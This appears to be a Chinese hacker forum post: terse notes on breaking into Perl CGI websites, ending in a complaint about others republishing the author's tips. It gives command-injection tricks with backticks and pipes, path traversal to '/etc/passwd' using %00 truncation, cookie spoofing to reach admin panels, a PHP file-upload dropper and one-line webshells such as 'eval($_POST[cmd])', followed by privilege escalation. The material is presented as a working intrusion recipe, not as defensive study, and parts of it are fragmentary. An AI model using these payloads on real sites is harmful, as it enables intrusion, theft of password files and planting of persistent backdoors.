总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
感谢EMM和ps的睿智和他们高超的脚本,还有以前老红4的脚本群英和国外的那些牛淫们
注“
perl脚本的大多出在open()、system()或者''调用中。前者允许读写和执行,而后两个允许执行。
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
随意构造
?&换个字符,也许可以执行呢
`单引号
`
`
`非常好的思路,把代码cat回来显示
|
|
|
类似''内的操作和命令执行自己构造
比如:cat<'/home1/siteadm/cgi-bin/home/news/test.pl'`把pl代码显示出来。
类似asp的Sqlinjection
?&......../../../etc/passwd
前面加./
注意后面的%00别弄丢了
查看php代码
emm和ps的一句话"<?copy($a,$b);unlink($a);?>"
echo"<?phpcopy(\$_FILES[MyFile][tmp_name],\$_FILES[MyFile][name]);?>">up.php
<?phpeval($_POST[cmd]);?>
>bbb%20|
showpost.pl\'并且寻找(用\'/\')\'SELECT\'字符串
这里的是elf是CCS中文linux操作系统特征
相关html为后缀的脚本,继续深挖中,但是不可质疑的是提交查询语句也是一种完美的方法
lynx
PS:很久前整理asp注射和php注射大全都是私下给好友的,不知道哪个马甲不够意思,就发了出去。现在满bbs和各动画站点都能看到,而且
作者乱七八糟,幸亏吃亏以后,再整理或者写的其他文章技巧,只给几个特好的朋友。再也不敢乱发了,用pinke话说,"我写/发现个东西我
容易吗,不知道怎么就被人做成动画或者教程,拿来赚钱也罢了,还要留一句话,没什么,黑站就这么简单."鄙视这些人们……有本事你
们自己写个lcx,或者什么shell去?我写不来,但是用朋友的,我也心安理得
当前位置:
